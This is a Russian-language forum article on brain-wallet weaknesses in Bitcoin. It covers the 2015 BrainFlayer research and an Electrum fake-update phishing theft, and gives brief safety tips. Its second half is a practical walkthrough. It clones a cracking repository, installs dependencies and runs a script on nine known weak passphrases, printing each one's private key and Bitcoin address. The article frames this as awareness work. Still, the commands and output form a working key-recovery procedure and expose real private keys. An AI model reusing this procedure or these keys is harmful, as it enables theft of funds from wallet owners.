Статья Tesla BrainWallet ловушки от Биткоин кошельков остерегаемся фишинга и популярных парольных фраз

Специальный корреспондент
Собака

Собака

Пресс-служба
Команда форума
Private Club
Регистрация
13/10/15
Сообщения
55.044
Репутация
62.940
Реакции
277.302
RUB
0
d3eb31e12dbe939992076b0b839bb6f3.png

Для создания Биткоин кошелька существует множество форм. Один из первых методов создания Биткойн кошелька был известен как .
BrainWallet удобен в том плане, что позволяет хранить в памяти или в блокноте "парольную фразу". Парольная фраза хешируется с использованием алгоритма SHA-256, и используется в качестве начального числа для создания .

Из-за своей популярности и простоты использования, многие BrainWallet за последние несколько лет использовались со слабыми парольными фразами.
Этот слабый способ генерации приватного ключа позволил злоумышленникам украсть довольно большое количество монет BTC, просто взломав пароль против хэшей, хранящихся в блокчейне. Хотя эта атака известна уже много лет, она стала широко известна в 2015 году благодаря работе, проделанной

[H3]7 августа 2015 года[/H3]
Райан Кастеллуччи (Ryan Castellucci) выступил на с докладом о взломе паролей . Хотя к этому моменту парольные фразы для BrainWallet использовались уже много лет, разговор помог донести эти проблемы до более широкой общественности



Document :

Райан опубликовал результаты своей работы по взлому BrainWallet в сочетании с инструментом под названием BrainFlayer проверенный взломщик для криптовалютных кошельков BrainWallet) и других алгоритмов с низким уровнем энтропии.
[H2]УСКОРЕНИЕ С ПОМОЩЬЮ GPU[/H2]
87f7ce6d2a7b0f55ea99f5b38033c904.png

На данный момент пробный cracker от Райана модернизировали в различные софты, утилиты, скрипты и тому подобное, но все же был создан графический ускоритель для BrainWallet при помощи поддержки среды выполнения графического процессора. Такие ускорители носят название от название семейства вычислительных систем

b975f50df1ff071705fc4660df86fcfe.png

[H2]Фишинг[/H2]
Многие сторонники Биткоина часто приводят BrainWallet в качестве хорошего метода защиты средств от возможной конфискации, но к сожалению существуют много ловушек
для Bitcoin клиента Electrum.

Хотя Electrum поддерживает все популярные аппаратные кошельки (например, Trezor, Ledger и пр.) В плоть до установления сторонних плагинов для расширения функционала кошелька, но если вы установите старую версию Биткоин кошелька вы можете подвергнуть риску потерять все криптовалютные монеты в кошельке.
f38a38705a61104eac3fec1fa281967b.png

Эта ловушка популярна под словом "фишинг". В криптосообществе есть очень много печальных истории. Одним из самых крупных потерь от фишинга на сумму 1400 BTC (16 миллионов долларов США)

Согласно порталу криптоиндустрии

Cамая крупная потеря от фишинга на сумму 1400 BTC (16 миллионов долларов США)
Cамая крупная потеря от фишинга на сумму 1400 BTC (16 миллионов долларов США)
Анонимный биткойн-инвестор по имени «1400BitcoinStolen» заявил в воскресенье, что он потерял 1400 BTC после «глупой» установки старой версии популярного кошелька Electrum, но это оказалось .
Ловушка:
Объясняя неприятный инцидент, потерпевший сказал, что не мог получить доступ к средствам с 2017 года. После настройки кошелька и попытки перевести 1 BTC он получил всплывающее сообщение с просьбой обновить свою систему безопасности, прежде чем он сможет осуществить перевод. К сожалению это была ловушка — попытка фишинга. По словам жертвы, он установил обновление, и все его средства были автоматически переведены на адрес кошелька хакеров, что сделало мошенников богаче на 16 миллионов долларов США.
[H2]Как не стать жертвой фишинга?[/H2]
В наших ранних публикациях мы настойчиво рекомендуем всем:

  • использовать только проверенное ПО;
  • ознакомиться с исходным кодом;
  • делать сборку самостоятельно;
  • делать обновление;
[H2]Слабые парольные фразы[/H2]
[H4]Перейдем к экспериментальной части:[/H4]
Откроем .

Воспользуемся репозиторием .

Код:
 git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/13TeslaBrainWallet/ ls
ea4a8b182c3f2dec717d0ba5065814ff.png

[H4]Установим pip2 для Python 2.7[/H4]
(т.к. с 20 сентября 2022 года Google Colab не использует "pip2" по умолчанию для "Python 2.7")

Код:
 wget https://bootstrap.pypa.io/pip/2.7/get-pip.py sudo python2 get-pip.py
e6ace0283266b3d45070bdd532608002.png
d08ae0e674562990102e79f241632282.png
09cd15abe73dc5e370ef9f25c75e5160.png

[H3]Установим библиотеку криптографических подписей ECDSA[/H3]
Код:
 pip2 install ecdsa
b329b6c7144dd2b8127fc10af35c1f65.png

[H2]Запуск Python-скрипта: teslaBTC.py[/H2]
[H4]История слабых парольных фраз с положительным балансом монет BTC[/H4]
Откроем и проверим:

[HR=2][/HR]
Код:
 python2 teslaBTC.py "arretonprimaryschool"
244db43c9b11dedf3623684d52223cbf.png

Код:
 Pass phrase: arretonprimaryschool Private key: 0e57a34ee4cf2242bc331494981aa896e803c598cc4a0f890b2e85d6acb85f29 Bitcoin address: 16jLdtAxgXVwcG93MyPcNALXMCv3D6dyDB
19e8984f167ef9016ab399abfbc02074.png

[HR=2][/HR]
Код:
 python2 teslaBTC.py "correct horse battery staple"
c7587310dafe93cfbc5cdf8cbcb22a6e.png

Код:
 Pass phrase: correct horse battery staple Private key: c4bbcb1fbec99d65bf59d85c8cb62ee2db963f0fe106f483d9afa73bd4e39a8a Bitcoin address U: 1JwSSubhmg6iPtRjtyqhUYYH7bZg3Lfy1T Bitcoin address C: 1C7zdTfnkzmr13HfA2vNm5SJYRK6nEKyq8
97a03c68708ccf42ff0d8353c9d08840.png
30883e3b410d3a03e451b37e40d2f40f.png

[HR=2][/HR]
Код:
 python2 teslaBTC.py "This is the way the world ends."
ed0d4448b42141bdf4f04d1e7cc94865.png

Код:
 Pass phrase: This is the way the world ends. Private key: 1bad2815705c693b4df94badf0f757c601d841bff62c40f9546432034a4c29b7 Bitcoin address: 1DnqpnCFiXqMhvRfdRzPcRao7yxyoeXgjf
594d8096f10f02e05286f74a2c81e16e.png

[HR=2][/HR]
Код:
 python2 teslaBTC.py "The quick brown fox jumps over the lazy dog"
e14d796328d2f0958131e5219c684567.png

Код:
 Pass phrase: The quick brown fox jumps over the lazy dog Private key: d7a8fbb307d7809469ca9abcb0082e4f8d5651e46d3cdb762d02d0bf37c9e592 Bitcoin address: 13w4Hn1BJQM4bjZZgYtXpyp4cioiw29tKj
4ccdaf14d74e7379b9f160c509655bf7.png

[HR=2][/HR]
Код:
 python2 teslaBTC.py "just let the lovin take ahold"
e741ef7a2c8bd6a0cec046d677e41ee0.png

Код:
 Pass phrase: just let the lovin take ahold Private key: 5e6fa5565782e85f3e305c422388e687e4fc8c2e7c572748f57ff7a4d6ff736a Bitcoin address: 1H6nTPQ8wqdQ3QFrGc1qy9r63acpTAkwvc
4fd7cb9c4c6a831453a577f91a1023f9.png

[HR=2][/HR]
Код:
 python2 teslaBTC.py "en un lugar de la mancha"
375fb681d891de3e84642285103bf099.png

Код:
 Pass phrase: en un lugar de la mancha Private key: e9f852cd97283461e254da265a27d2bda07f245cb5f8a6ee622355fcec63eb8c Bitcoin address: 1Gwd5BQCDsFrEvokGkto945smazwEMKqdo
0314795429f25f2ba27fbf1521eb9cfc.png

[HR=2][/HR]
Код:
 python2 teslaBTC.py "The quick brown fox jumped over the lazy dog."
6c517c7f8a99a9767987f0b6e2664cc2.png

Код:
 Pass phrase: The quick brown fox jumped over the lazy dog. Private key: 68b1282b91de2c054c36629cb8dd447f12f096d3e3c587978dc2248444633483 Bitcoin address: 1E2Wgex1ZGfZ9gb4MBubJJ5bnABkk2pbZf
6a9866bf2cee350e2c2aa8a09ef20a26.png

[HR=2][/HR]
Код:
 python2 teslaBTC.py "Thats what she said 1974"
d9270c13ee19a7ea2ce3b19d66199a37.png

Код:
 Pass phrase: Thats what she said 1974 Private key: 0e3630f0f829d93afd8569f7c50aaced3d930353db8468d8c42b58d7f5ce1fdb Bitcoin address: 113W1qXf6DsJFtqMnR53tqvLrVfjkjR7g5
dec5124a1774b939cd296c4f68545a98.png

[HR=2][/HR]
Код:
 python2 teslaBTC.py "lorem ipsum dolor sit amet"
405d4ef3b31f46aef3b278cfff23ac17.png

Код:
 Pass phrase: lorem ipsum dolor sit amet Private key: 2f8586076db2559d3e72a43c4ae8a1f5957abb23ca4a1f46e380dd640536eedb Bitcoin address: 1KRGyNbq2yM1vAXscib74Snp6AUuUHVi2g
b161d5ae737830255fcf4f715f57a3b9.png














 
Сверху Снизу